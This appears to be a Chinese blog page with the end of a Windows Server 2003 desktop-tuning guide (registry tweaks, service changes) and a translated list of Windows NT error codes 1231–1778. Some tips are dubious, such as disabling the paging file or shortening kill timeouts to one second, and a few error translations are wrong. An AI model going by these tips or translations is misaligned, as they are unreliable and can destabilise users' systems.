★硬件加速：桌面点击右键－－属性（Properties） -> 设置（Settings ）－－高级（ Advanced ）－－疑难解答（Troubleshoot）。把该页面的硬件加速滚动条拉到“完全”（ Full），最好点击“确定”（OK）保存退出。这期间可能出现一瞬的黑屏是完全正常。

★DirectX加速：打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊断工具”（DirectX Tools），在“显示”（Display）页面，点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。把“声音的硬件加速级别”（Hardware Sound Acceleration Level）滚动条拉到“完全加速”（ Full Acceleration）。

8.启用桌面主题和隐藏文件
打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，选themes“主题”（默认是禁止的），然后改为“自动”，按“应用”，选“开启”。接着点“桌面”的属性，在“主题”里选“windows xp”Windows Server 2003默认显示所有的文件夹，如果可以通过以下方法来隐藏：打开任意一个文件夹，选择“工具” -> “文件夹选项” -> “查看”，选择“不显示隐藏的文件和文件夹”，点击“确定”。

9.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务
★启用Windows内置的IMAPI CD-Burning服务：打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK）

★假如你有如数码相机和扫描仪之类的影像设备，应该打开Windows Image Acquisition 服务。
打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“Windows Image Acquisition (WIA) ”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK）

10.高级设置
★禁用错误报告
右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－点击“错误报告”（Error Reporting ）按钮，在出现的窗口中把“禁用错误报告”（Disable Error Reporting）选上并复选“但在发生严重错误时通知我”

（But, notify me when critical errors occur.）

★调整虚拟内存
一些朋友经常会对关机和注销缓慢感到束手无策，解决办法就是禁用虚拟内存，这样你的注销和关机时间可能会加快很多。右键点击“我的电脑”（My Computer）－－属性（Properties）－－高级（Advanced）－－性能（Performance）－－设置（Setting）－－高级（Advanced），点击“虚拟内存”（Virtual memory）部分的“更改”（Change），然后在出现的窗口选择“无分页文件”。重启系统即可。

11.加快启动和运行速度

**修改注册表，减少预读取，减少进度条等待时间：开始→运行→regedit启动注册表编辑器，HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters， 有一个键值名为EnablePrefetcher，它的值是3,把它改为“1”或“5”。找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control， 将 WaitToKillServiceTimeout 设为：1000或更小。 ( 原设定值：20000 ) 找到 HKEY_CURRENT_USER\Control Panel\Desktop 键，将右边视窗的WaitToKillAppTimeout 改为 1000， ( 原设定值：20000 )即关闭程序时仅等待1秒。将 HungAppTimeout 值改为：200( 原设定值：5000 )， 表示程序出错时等待0.5秒。

**让系统自动关闭停止回应的程式。
打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键， 将 AutoEndTasks 值设为 1。 ( 原设定值：0 )

**禁用系统服务Qos
开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败。

**改变窗口弹出的速度：
找到HKEY_CURRENT_USER＼Control Panel＼Desktop＼WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改。

**禁止Windows XP的压缩功能：
点击“开始”下的“运行”，在“运行”输入框中输入“regsvr32/u zipfldr.dll”，然后按回车键即可。

**设置个性的启动信息或警告信息：
个性化的Windows XP启动：打开注册表编辑器，找到HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT＼CurrentVersion＼Winlogon子键分支，双击LegalNoticeCaption健值，打开“编辑字符串”对话框，在“数值数据”下的文本框中输入自己想要的信息标题，如“哥们儿，你好！”，然后点击“确定”，重新启动。如果想要改变警告信息的话可以双击LegalNoticeText健值名称，在出现的“编辑字符串”窗口中输入想要显示的警告信息，单击“确定”，重新启动。


Windows NT 错误代码(二)

《一键清理系统垃圾》

Windows NT 错误代码(二)

1231L ERROR_NETWORK_UNREACHABLE　　　　　　 无法通过传输连接远程网络。
1232L ERROR_HOST_UNREACHABLE　　　　　　　　不能通过传输访问远程系统。
1233L ERROR_PROTOCOL_UNREACHABLE　　　　　　远程系统不支持传输协议。
1234L ERROR_PORT_UNREACHABLE　　　　　　　　没有任何服务正在远程系统上
                                            的目标网络终结点上操作。
1235L ERROR_REQUEST_ABORTED　　　　　　　　 请求被终止。
1236L ERROR_CONNECTION_ABORTED　　　　　　　由本地系统终止网络连接。
1237L ERROR_RETRY　　　　　　　　　　　　　 操作无法完成。应该重试。
1238L ERROR_CONNECTION_COUNT_LIMIT　　　　　因为已达到此帐户的最大同时连
                                            接数限制，所以无法连接服务器。
1239L ERROR_LOGIN_TIME_RESTRICTION　　　　　试图在本帐户的未授权时间内登录。
1240L ERROR_LOGIN_WKSTA_RESTRICTION　　　　 此帐户并未得到从这个工作站
                                            登录的授权。
1241L ERROR_INCORRECT_ADDRESS　　　　　　　 请求的操作不能使用这个网络地址。
1242L ERROR_ALREADY_REGISTERED　　　　　　　服务已经注册。
1243L ERROR_SERVICE_NOT_FOUND　　　　　　　 指定服务不存在。
1244L ERROR_NOT_AUTHENTICATED　　　　　　　 因为用户还未被验证，不能执行所
                                            要求的操作。
1245L ERROR_NOT_LOGGED_ON　　　　　　　　　 因为用户还未登录网络，不能执行
                                            所要求的操作。
1246L ERROR_CONTINUE　　　　　　　　　　　　返回需要调用方继续工作的消息。
1247L ERROR_ALREADY_INITIALIZED　　　　　　 试图进行初始操作，但是初始
                                            化已完成。
1248L ERROR_NO_MORE_DEVICES　　　　　　　　 没有更多的本地设备。
1300L ERROR_NOT_ALL_ASSIGNED　　　　　　　　表示未指派所有的参考特权给调用方。
                                            例如，可以允许禁用所有的特权而不
                                            必知道是否已指派了那一项特权。
1301L ERROR_SOME_NOT_MAPPED　　　　　　　　 尚未解释某些映射信息。
1302L ERROR_NO_QUOTAS_FOR_ACCOUNT　　　　　 没有为该帐户特别设置系统配额限制。
1303L ERROR_LOCAL_USER_SESSION_KEY　　　　　本地 RPC 连接请求用户会话键。本会
                                            话键返回一常数值且非本连接的唯一值。
1304L ERROR_NULL_LM_PASSWORD　　　　　　　　Windows NT 密码太复杂，无法转换成
                                            Windows 网络密码。Windows 网络密码返回
                                            NULL 字符串。
1305L ERROR_UNKNOWN_REVISION　　　　　　　　表示已遇到或指定一服务未知的修定号码。
                                            该号码可能不是服务所知的最近修正。
1306L ERROR_REVISION_MISMATCH　　　　　　　 表明两个修订级别是不兼容的。
1307L ERROR_INVALID_OWNER　　　　　　　　　 表示某一特定的安全性 ID 可能无
                                            法指派为一对象的所有者。
1308L ERROR_INVALID_PRIMARY_GROUP　　　　　 表示某一特定的安全性 ID 可能无法
                                            指派为一对象的主要组。
1309L ERROR_NO_IMPERSONATION_TOKEN　　　　　当前并未模拟客户的线程试图操作模拟令牌。
1310L ERROR_CANT_DISABLE_MANDATORY　　　　　无法禁用强制组。
1311L ERROR_NO_LOGON_SERVERS　　　　　　　　目前没有可用的登录服务器处理
                                            登录请求。
1312L ERROR_NO_SUCH_LOGON_SESSION　　　　　 指定的登录会话不存在。可能已被终止。
1313L ERROR_NO_SUCH_PRIVILEGE　　　　　　　 指定的特权不存在。
1314L ERROR_PRIVILEGE_NOT_HELD　　　　　　　客户没有需要的特权。
1315L ERROR_INVALID_ACCOUNT_NAME　　　　　　提供的名称不是正确格式的帐户名。
1316L ERROR_USER_EXISTS　　　　　　　　　　 指定的用户已经存在。
1317L ERROR_NO_SUCH_USER　　　　　　　　　　指定的用户不存在。
1318L ERROR_GROUP_EXISTS　　　　　　　　　　指定的组已经存在。
1319L ERROR_NO_SUCH_GROUP　　　　　　　　　 指定的组不存在。
1320L ERROR_MEMBER_IN_GROUP　　　　　　　　 指定的用户帐户已存在于指定的组
                                            帐户中。同时用于指出由于组
                                            包含成员而不能将其删除。
1321L ERROR_MEMBER_NOT_IN_GROUP　　　　　　 指定的用户帐户不是指定组帐户的成员。
1322L ERROR_LAST_ADMIN　　　　　　　　　　　表示所请求的操作将禁用或删除最
                                            近的系统管理员帐户。这可防
                                            止产生无法管理系统的状态。
1323L ERROR_WRONG_PASSWORD　　　　　　　　　当试图更新密码时，本返回状态表示所
                                            提供的当前密码不正确。
1324L ERROR_ILL_FORMED_PASSWORD　　　　　　 当试图更新密码时，本返回
                                            状态表示为新密码所提供的值中
                                            包含不被允许的值。
1325L ERROR_PASSWORD_RESTRICTION　　　　　　当试图更新密码时，本状态表示
                                            已违反某些密码更新规则。例如，
                                            密码不符合长度标准。
1326L ERROR_LOGON_FAILURE　　　　　　　　　 尝试的登录无效。可能是用户名或身份验证
                                            信息错误。
1327L ERROR_ACCOUNT_RESTRICTION　　　　　　 表示参考的用户名及验证信息合法，
                                            但某些用户帐户限制验证没有成功
                                            (如日期时间限制)。
1328L ERROR_INVALID_LOGON_HOURS　　　　　　 用户帐户设有时间限制而无法在此期间内登录。
1329L ERROR_INVALID_WORKSTATION　　　　　　 用户帐户设有时间限制而无法从原工作站登录。
1330L ERROR_PASSWORD_EXPIRED　　　　　　　　用户帐户的密码已过期。
1331L ERROR_ACCOUNT_DISABLED　　　　　　　　参考帐户当前已禁用且无法登录。
1332L ERROR_NONE_MAPPED　　　　　　　　　　 尚未解释任何信息。
1333L ERROR_TOO_MANY_LUIDS_REQUESTED　　　　LUID 请求的数量无法分配单一单位。
1334L ERROR_LUIDS_EXHAUSTED　　　　　　　　 表示不需要再分配任何的 LUID。
1335L ERROR_INVALID_SUB_AUTHORITY　　　　　 表示特定用途的次权限值无效。
1336L ERROR_INVALID_ACL　　　　　　　　　　 表示 ACL 结构无效。
1337L ERROR_INVALID_SID　　　　　　　　　　 表示 SID 结构无效。
1338L ERROR_INVALID_SECURITY_DESCR　　　　　表示
                                            SECURITY_DESCRIPTOR 结构无效。
1340L ERROR_BAD_INHERITANCE_ACL　　　　　　 表示试图创建一继承的 ACL 或 ACE 失败。
                                            最可能的原因为以 SID 替换创建者标识
                                            而无法与 ACE 或 ACL 相配合。
1341L ERROR_SERVER_DISABLED　　　　　　　　 GUID 分配服务器此时已禁用。
1342L ERROR_SERVER_NOT_DISABLED　　　　　　 GUID 分配服务器此时已启用。
1343L ERROR_INVALID_ID_AUTHORITY　　　　　　提供给识别代号颁发机构的值为无效值。
1344L ERROR_ALLOTTED_SPACE_EXCEEDED　　　　 当内存块分配用以未来更新使用时(如
                                            将内存分配为保持自由访问控制及主要
                                            组信息)，后续的更新可能会超过原
                                            始所分配的内存数量。因为配额可
                                            能已分配给许多含有对象句柄的过程，
                                            所以最好不更改已分配内存的大小。
                                            相反地，一项请求多于已分配内存
                                            的请求将失败且会返回
                                            ERROR_ALLOTTED_SPACE_EXCEEDED
                                            错误。
1345L ERROR_INVALID_GROUP_ATTRIBUTES　　　　指定属性无效，或与整个群体的属性不兼容。
1346L ERROR_BAD_IMPERSONATION_LEVEL　　　　 指定的模拟等级无效。同时也表示
                                            未提供所请求的模拟等级。
1347L ERROR_CANT_OPEN_ANONYMOUS　　　　　　 试图打开一匿名等级令牌。匿名等
                                            级令牌可能无法打开。
1348L ERROR_BAD_VALIDATION_CLASS　　　　　　所请求的身份验证信息类无效。
1349L ERROR_BAD_TOKEN_TYPE　　　　　　　　　令牌对象的类型对其尝试使用的方法不适当。
1350L ERROR_NO_SECURITY_ON_OBJECT　　　　　 表示试图在同安全设置无关的对象上运行操作。
1351L ERROR_CANT_ACCESS_DOMAIN_INFO　　　　 表示域控制器无法连到域控制器或者域中的对象
                                            受到保护，无法检索必须的信息。
1352L ERROR_INVALID_SERVER_STATE　　　　　　表示 Sam 服务器处于运行所需操作的错误状态。
1353L ERROR_INVALID_DOMAIN_STATE　　　　　　表示域处于运行操作的错误状态。
1354L ERROR_INVALID_DOMAIN_ROLE　　　　　　 表示所请求的操作无法以现有角色拥有域。
1355L ERROR_NO_SUCH_DOMAIN　　　　　　　　　指定的域不存在。
1356L ERROR_DOMAIN_EXISTS　　　　　　　　　 指定的域已存在。
1357L ERROR_DOMAIN_LIMIT_EXCEEDED　　　　　 试图超过该版本的每服务器上域数量限制。
1358L ERROR_INTERNAL_DB_CORRUPTION　　　　　该错误指出由于灾难性的媒体失败或磁盘
                                            数据结构损坏而无法完成所需的操作。
1359L ERROR_INTERNAL_ERROR　　　　　　　　　该错误指出 SAM 在其数据库中遇到内部不一致错误。
                                            这一灾难性的失败无法完成进一步的 SAM 操作。
1360L ERROR_GENERIC_NOT_MAPPED　　　　　　　表示已映射至非一般访问类型的访问屏蔽中，
                                            应包含一般的访问类型。
1361L ERROR_BAD_DESCRIPTOR_FORMAT　　　　　 表示不须设置安全描述符的特定格式(绝对或自我相对)。
1362L ERROR_NOT_LOGON_PROCESS　　　　　　　 请求操作只限制在登录进程中使用。
                                            调用进程未注册为一个登录进程。
1363L ERROR_LOGON_SESSION_EXISTS　　　　　　已尝试用正在使用的 ID 启动新的会话管理器
                                            或 LSA 登录会话。
1364L ERROR_NO_SUCH_PACKAGE　　　　　　　　 指定的身份验证数据包为未知。
1365L ERROR_BAD_LOGON_SESSION_STATE　　　　 登录会话的状态与请求的操作不一致。
1366L ERROR_LOGON_SESSION_COLLISION　　　　 登录会话标识已在使用中。
1367L ERROR_INVALID_LOGON_TYPE　　　　　　　为要求的 LogonType 提供了无效的值。
1368L ERROR_CANNOT_IMPERSONATE　　　　　　　试图通过一尚未读取的命名管道来运行模拟。
1369L ERROR_RXACT_INVALID_STATE　　　　　　 表示注册表子目录树的处理状态同请求的操作不兼容。
                                            例如，在运行中的事务启动一新事务的请求，
                                            或应用当前未运行的事务处理的请求。
                                            由运行时库 (RTL) 注册表处理数据包 (RXact)
                                            返回该状态值。
1370L ERROR_RXACT_COMMIT_FAILURE　　　　　　在注册表处理提交期间出错。数据库可能处于
                                            不一致的未知状态。注册表事务处理的状态
                                            保留为 COMMITTING。由运行时库 (RTL) 注册表处理
                                            包 (RXact) 返回此状态值。
1371L ERROR_SPECIAL_ACCOUNT　　　　　　　　 指出在和内置帐户不兼容的内置(特殊)SAM 帐户上
                                            尝试进行操作；例如，不能删除或重命名内置帐户。
1372L ERROR_SPECIAL_GROUP　　　　　　　　　 因为指定的组是内置的特殊组，无法对其
                                            执行要求的操作。
1373L ERROR_SPECIAL_USER　　　　　　　　　　因为指定的用户是内置的特殊用户，
                                            无法对其执行要求的操作。
1374L ERROR_MEMBERS_PRIMARY_GROUP　　　　　 指出当组当前是其成员的主要组时，
                                            不能将其成员从中删除。
1375L ERROR_TOKEN_ALREADY_IN_USE　　　　　　试图以使用中的令牌创建主要令牌。过
                                            程内一次只能有一个主要令牌。
1376L ERROR_NO_SUCH_ALIAS　　　　　　　　　 指定的别名不存在。
1377L ERROR_MEMBER_NOT_IN_ALIAS　　　　　　 指定的帐号名不是别名的成员。
1378L ERROR_MEMBER_IN_ALIAS　　　　　　　　 指定的帐号名不是别名的成员。
1379L ERROR_ALIAS_EXISTS　　　　　　　　　　指定的别名已经存在。
1380L ERROR_LOGON_NOT_GRANTED　　　　　　　 目标系统的本地安全策略不承认所请求
                                            的登录类型(如交互用户、网络用户、
                                            服务用户)。系统管理员可以承认允许的登录格式。
1381L ERROR_TOO_MANY_SECRETS　　　　　　　　超过单一系统所能保存的最大机密数。
                                            机密的长度及数量受限于美国国务院的
                                            出口管制。
1382L ERROR_SECRET_TOO_LONG　　　　　　　　 机密的长度超过允许的最大长度。机密
                                            的长度及数量受限于美国国务院的出口管制。
1383L ERROR_INTERNAL_DB_ERROR　　　　　　　 本地安全颁发机构 (LSA) 数据库内部包含不一致性。
1384L ERROR_TOO_MANY_CONTEXT_IDS　　　　　　用户的安全上下文在登录期间累积过多的安全识别号。
                                            请从一些组或别名中删除该用户以减少安全范围中的
                                            安全识别号数目。
1385L ERROR_LOGON_TYPE_NOT_GRANTED　　　　　用户要求一种未授权的登录方式(例如，
                                            交互或网络)。管理员可以控制用户
                                            交互或通过网络登录。
1386L ERROR_NT_CROSS_ENCRYPTION_REQUIRED　　试图更改安全帐户管理器中的用户密码，
                                            但未提供必须的 NT 交互加密密码。
1387L ERROR_NO_SUCH_MEMBER　　　　　　　　　无法向别名添加新成员因为成员不存在。
1388L ERROR_INVALID_MEMBER　　　　　　　　　无法向别名添加新成员，因为成员帐号类型错误。
1389L ERROR_TOO_MANY_SIDS　　　　　　　　　 指定的 SID 过多。
1390L ERROR_LM_CROSS_ENCRYPTION_REQUIRED　　试图更改安全帐户管理器中的用户密码，
                                            但未提供必须的 LM 交互加密密码。
1391L ERROR_NO_INHERITANCE　　　　　　　　　表明 ACL 未包含任何可承继的组件。
1392L ERROR_FILE_CORRUPT　　　　　　　　　　文件或目录损坏且无法读取。
1393L ERROR_DISK_CORRUPT　　　　　　　　　　磁盘结构损坏且无法读取。
1394L ERROR_NO_USER_SESSION_KEY　　　　　　 无任何指定登录会话的用户会话项。
1395L ERROR_LICENSE_QUOTA_EXCEEDED　　　　　正在访问的服务有连接数目标授权限制。
                                            这时候已经无法再连接，原因是
                                            已经到达可接受的连接数目上限。
1400L ERROR_INVALID_WINDOW_HANDLE　　　　　 窗口句柄无效。
1401L ERROR_INVALID_MENU_HANDLE　　　　　　 菜单句柄无效。
1402L ERROR_INVALID_CURSOR_HANDLE　　　　　 光标句柄无效。
1403L ERROR_INVALID_ACCEL_HANDLE　　　　　　无效的加减器表句柄。
1404L ERROR_INVALID_HOOK_HANDLE　　　　　　 挂接程序句柄无效。
1405L ERROR_INVALID_DWP_HANDLE　　　　　　　DeferWindowPos 句柄无效。
1406L ERROR_TLW_WITH_WSCHILD　　　　　　　　CreateWindow 失败，使用 WS_CHILD
                                            样式创建顶级窗口。
1407L ERROR_CANNOT_FIND_WND_CLASS　　　　　 无法找到窗口类。
1408L ERROR_WINDOW_OF_OTHER_THREAD　　　　　无效窗口，当属于另一线程。
1409L ERROR_HOTKEY_ALREADY_REGISTERED　　　 快捷键已注册。
1410L ERROR_CLASS_ALREADY_EXISTS　　　　　　类已经存在。
1411L ERROR_CLASS_DOES_NOT_EXIST　　　　　　类不存在。
1412L ERROR_CLASS_HAS_WINDOWS　　　　　　　 类窗口仍打开着。
1413L ERROR_INVALID_INDEX　　　　　　　　　 索引无效。
1414L ERROR_INVALID_ICON_HANDLE　　　　　　 图标句柄无效。
1415L ERROR_PRIVATE_DIALOG_INDEX　　　　　　使用专用 DIALOG 窗口字。
1416L ERROR_LISTBOX_ID_NOT_FOUND　　　　　　未找到列表框 ID。
1417L ERROR_NO_WILDCARD_CHARACTERS　　　　　未找到通配符字符。
1418L ERROR_CLIPBOARD_NOT_OPEN　　　　　　　线程没有打开的剪贴板。
1419L ERROR_HOTKEY_NOT_REGISTERED　　　　　 快捷键没有注册。
1420L ERROR_WINDOW_NOT_DIALOG　　　　　　　 窗口不是合法的对话窗口。
1421L ERROR_CONTROL_ID_NOT_FOUND　　　　　　找不到控件 ID。
1422L ERROR_INVALID_COMBOBOX_MESSAGE　　　　无效的消息框、组合框没有编辑控件。
1423L ERROR_WINDOW_NOT_COMBOBOX　　　　　　 窗口不是组合框。
1424L ERROR_INVALID_EDIT_HEIGHT　　　　　　 高度必须小于 256。
1425L ERROR_DC_NOT_FOUND　　　　　　　　　　无效的 HDC 传递给 ReleaseDC。
1426L ERROR_INVALID_HOOK_FILTER　　　　　　 钩子程序所过滤的消息类型无效。
1427L ERROR_INVALID_FILTER_PROC　　　　　　 钩子程序过程无效。
1428L ERROR_HOOK_NEEDS_HMOD　　　　　　　　 不能在无模块句柄的情况下设置非本地的钩子程序。
1429L ERROR_GLOBAL_ONLY_HOOK　　　　　　　　本钩子程序不能设置位全局的。
1430L ERROR_JOURNAL_HOOK_SET　　　　　　　　Journal Hook 程序已安装。
1431L ERROR_HOOK_NOT_INSTALLED　　　　　　　没有安装钩子程序。
1432L ERROR_INVALID_LB_MESSAGE　　　　　　　单个选择列表框的消息无效。
1433L ERROR_SETCOUNT_ON_BAD_LB　　　　　　　LB_SETCOUNT 发送到非被动的列表框。
1434L ERROR_LB_WITHOUT_TABSTOPS　　　　　　 本列表框不支持制表位。
1435L ERROR_DESTROY_OBJECT_OF_OTHER_THREAD　无法毁坏由另一个线程创建的对象。
1436L ERROR_CHILD_WINDOW_MENU　　　　　　　 子窗口没有菜单。
1437L ERROR_NO_SYSTEM_MENU　　　　　　　　　窗口没有系统菜单。
1438L ERROR_INVALID_MSGBOX_STYLE　　　　　　消息框样式无效。
1439L ERROR_INVALID_SPI_VALUE　　　　　　　 SPI_* 参数无效。
1440L ERROR_SCREEN_ALREADY_LOCKED　　　　　 已锁定屏幕。
1441L ERROR_HWNDS_HAVE_DIFFERENT_PARENT　　 所有 DeferWindowPos HWNDs 必须有相同的父窗口。
1442L ERROR_NOT_CHILD_WINDOW　　　　　　　　窗口不是子窗口。
1443L ERROR_INVALID_GW_COMMAND　　　　　　　GW_* 命令无效。
1444L ERROR_INVALID_THREAD_ID　　　　　　　 线程 ID 无效。
1445L ERROR_NON_MDICHILD_WINDOW　　　　　　 用非 MDI 子窗口调用 DefMDIChildProc。
1446L ERROR_POPUP_ALREADY_ACTIVE　　　　　　弹出式菜单已经激活。
1447L ERROR_NO_SCROLLBARS　　　　　　　　　 窗口没有滚动条。
1448L ERROR_INVALID_SCROLLBAR_RANGE　　　　 滚动条范围大于 0x7FFF。
1449L ERROR_INVALID_SHOWWIN_COMMAND　　　　 ShowWindow 命令无效。
1450L ERROR_NO_SYSTEM_RESOURCES　　　　　　 系统资源不足，无法完成请求的服务。
1451L ERROR_NONPAGED_SYSTEM_RESOURCES　　　 系统资源不足，无法完成请求的服务。
1452L ERROR_PAGED_SYSTEM_RESOURCES　　　　　系统资源不足，无法完成请求的服务。
1453L ERROR_WORKING_SET_QUOTA　　　　　　　 配额不足，无法完成请求的服务。
1454L ERROR_PAGEFILE_QUOTA　　　　　　　　　配额不足，无法完成请求的服务。
1455L ERROR_COMMITMENT_LIMIT　　　　　　　　页面文件太小，无法完成操作。
1456L ERROR_MENU_ITEM_NOT_FOUND　　　　　　 找不到菜单项。
1457L ERROR_INVALID_KEYBOARD_HANDLE　　　　 键盘布局句柄无效。
1458L ERROR_HOOK_TYPE_NOT_ALLOWED　　　　　 钩子类型不允许。
1500L ERROR_EVENTLOG_FILE_CORRUPT　　　　　 事件日志的日志文件之一被破坏。
1501L ERROR_EVENTLOG_CANT_START　　　　　　 无法打开事件日志文件，事件日志服务没有启动。
1502L ERROR_LOG_FILE_FULL　　　　　　　　　 事件日志文件已满。
1503L ERROR_EVENTLOG_FILE_CHANGED　　　　　 事件日志文件已在读取间更改。
1700L RPC_S_INVALID_STRING_BINDING　　　　　串绑定无效。
1701L RPC_S_WRONG_KIND_OF_BINDING　　　　　 绑定句柄类型不正确。
1702L RPC_S_INVALID_BINDING　　　　　　　　 绑定句柄无效。
1703L RPC_S_PROTSEQ_NOT_SUPPORTED　　　　　 不支持 RPC 协议序列。
1704L RPC_S_INVALID_RPC_PROTSEQ　　　　　　 RPC 协议序列无效。
1705L RPC_S_INVALID_STRING_UUID　　　　　　 串 UUID 无效。
1706L RPC_S_INVALID_ENDPOINT_FORMAT　　　　 终结点格式无效。
1707L RPC_S_INVALID_NET_ADDR　　　　　　　　网络地址无效。
1708L RPC_S_NO_ENDPOINT_FOUND　　　　　　　 找不到终结点
1709L RPC_S_INVALID_TIMEOUT　　　　　　　　 超时值无效。
1710L RPC_S_OBJECT_NOT_FOUND　　　　　　　　找不到对象 UUID。
1711L RPC_S_ALREADY_REGISTERED　　　　　　　对象 UUID 已注册。
1712L RPC_S_TYPE_ALREADY_REGISTERED　　　　 类型 UUID 已注册。
1713L RPC_S_ALREADY_LISTENING　　　　　　　 服务器已在侦听。
1714L RPC_S_NO_PROTSEQS_REGISTERED　　　　　未登记任何协议序列。
1715L RPC_S_NOT_LISTENING　　　　　　　　　 服务器没有侦听。
1716L RPC_S_UNKNOWN_MGR_TYPE　　　　　　　　未知的管理器类型。
1717L RPC_S_UNKNOWN_IF　　　　　　　　　　　接口未知。
1718L RPC_S_NO_BINDINGS　　　　　　　　　　 没有绑定。
1719L RPC_S_NO_PROTSEQS　　　　　　　　　　 无任何协议顺序。
1720L RPC_S_CANT_CREATE_ENDPOINT　　　　　　无法创建终结点。
1721L RPC_S_OUT_OF_RESOURCES　　　　　　　　资源不足，无法完成此操作。
1722L RPC_S_SERVER_UNAVAILABLE　　　　　　　服务器不可使用。
1723L RPC_S_SERVER_TOO_BUSY　　　　　　　　 服务器太忙，无法处理此操作。
1724L RPC_S_INVALID_NETWORK_OPTIONS　　　　 网络选项无效。
1725L RPC_S_NO_CALL_ACTIVE　　　　　　　　　该线程中不存在活动的远程过程调用。
1726L RPC_S_CALL_FAILED　　　　　　　　　　 远程过程调用失败。
1727L RPC_S_CALL_FAILED_DNE　　　　　　　　 远程过程调用失败且未运行。
1728L RPC_S_PROTOCOL_ERROR　　　　　　　　　发生 RPC 协议错误。
1730L RPC_S_UNSUPPORTED_TRANS_SYN　　　　　 服务器不支持传送语法。
1731L RPC_S_SERVER_OUT_OF_MEMORY　　　　　　服务器内存不足，无法完成此项操作。
1732L RPC_S_UNSUPPORTED_TYPE　　　　　　　　不支持类型 UUID。
1733L RPC_S_INVALID_TAG　　　　　　　　　　 标记无效。
1734L RPC_S_INVALID_BOUND　　　　　　　　　 数组边界无效。
1735L RPC_S_NO_ENTRY_NAME　　　　　　　　　 绑定不包含任何项目名称。
1736L RPC_S_INVALID_NAME_SYNTAX　　　　　　 名称语法无效。
1737L RPC_S_UNSUPPORTED_NAME_SYNTAX　　　　 不支持名称语法。
1739L RPC_S_UUID_NO_ADDRESS　　　　　　　　 没有用来构造 UUID 的网络地址。
1740L RPC_S_DUPLICATE_ENDPOINT　　　　　　　终结点是一份备份。
1741L RPC_S_UNKNOWN_AUTHN_TYPE　　　　　　　未知的验证类型。
1742L RPC_S_MAX_CALLS_TOO_SMALL　　　　　　 调用的最大个数太小。
1743L RPC_S_STRING_TOO_LONG　　　　　　　　 字符串太长。
1744L RPC_S_PROTSEQ_NOT_FOUND　　　　　　　 没有找到 RPC 协议序列。
1745L RPC_S_PROCNUM_OUT_OF_RANGE　　　　　　过程号超出范围。
1746L RPC_S_BINDING_HAS_NO_AUTH　　　　　　 绑定不包含任何验证信息。
1747L RPC_S_UNKNOWN_AUTHN_SERVICE　　　　　 未知的验证服务。
1748L RPC_S_UNKNOWN_AUTHN_LEVEL　　　　　　 未知的验证级别。
1749L RPC_S_INVALID_AUTH_IDENTITY　　　　　 安全上下文无效。
1750L RPC_S_UNKNOWN_AUTHZ_SERVICE　　　　　 未知的授权服务。
1751L EPT_S_INVALID_ENTRY　　　　　　　　　 项目无效。
1752L EPT_S_CANT_PERFORM_OP　　　　　　　　 无法执行该操作。
1753L EPT_S_NOT_REGISTERED　　　　　　　　　终结点映射表中无更多的可用终结点。
1755L RPC_S_INCOMPLETE_NAME　　　　　　　　 项目名称不完整。
1756L RPC_S_INVALID_VERS_OPTION　　　　　　 版本选项无效。
1757L RPC_S_NO_MORE_MEMBERS　　　　　　　　 没有其他成员。
1758L RPC_S_NOT_ALL_OBJS_UNEXPORTED　　　　 没有内容未导出。
1759L RPC_S_INTERFACE_NOT_FOUND　　　　　　 未找到接口。
1760L RPC_S_ENTRY_ALREADY_EXISTS　　　　　　项目已存在。
1761L RPC_S_ENTRY_NOT_FOUND　　　　　　　　 找不到项目。
1762L RPC_S_NAME_SERVICE_UNAVAILABLE　　　　无可用的名称服务。
1764L RPC_S_CANNOT_SUPPORT　　　　　　　　　不支持所请求的操作。
1765L RPC_S_NO_CONTEXT_AVAILABLE　　　　　　无可用的安全上下文以允许模拟。
1766L RPC_S_INTERNAL_ERROR　　　　　　　　　RPC 中出现内部错误。
1767L RPC_S_ZERO_DIVIDE　　　　　　　　　　 服务器尝试将一个整数除零。
1768L RPC_S_ADDRESS_ERROR　　　　　　　　　 服务器中发生地址错误。
1769L RPC_S_FP_DIV_ZERO　　　　　　　　　　 服务器上的一次浮点操作引起除数为零。
1770L RPC_S_FP_UNDERFLOW　　　　　　　　　　服务器上发生浮点下溢。
1771L RPC_S_FP_OVERFLOW　　　　　　　　　　 服务器上发生浮点溢出。
1772L RPC_X_NO_MORE_ENTRIES　　　　　　　　 用于 auto_handle 绑定可用的服务器列表耗尽。
1773L RPC_X_SS_CHAR_TRANS_OPEN_FAIL　　　　 无法打开由 DCERPCCHARTRANS 指定的文件。
1774L RPC_X_SS_CHAR_TRANS_SHORT_FILE　　　　包含字符翻译表的文件少于 512 字节。
1775L RPC_X_SS_IN_NULL_CONTEXT　　　　　　　将空上下文句柄作为 [in] 参数传递。
1776L RPC_X_SS_CONTEXT_MISMATCH　　　　　　 该上下文句柄无法符合已知的范围句柄。
1777L RPC_X_SS_CONTEXT_DAMAGED　　　　　　　上下文句柄已在调用期间更改。
1778L RPC_X_SS_HANDLES_MISMATCH　　　　　　 传送给远程过程调用的绑定句柄不匹配。
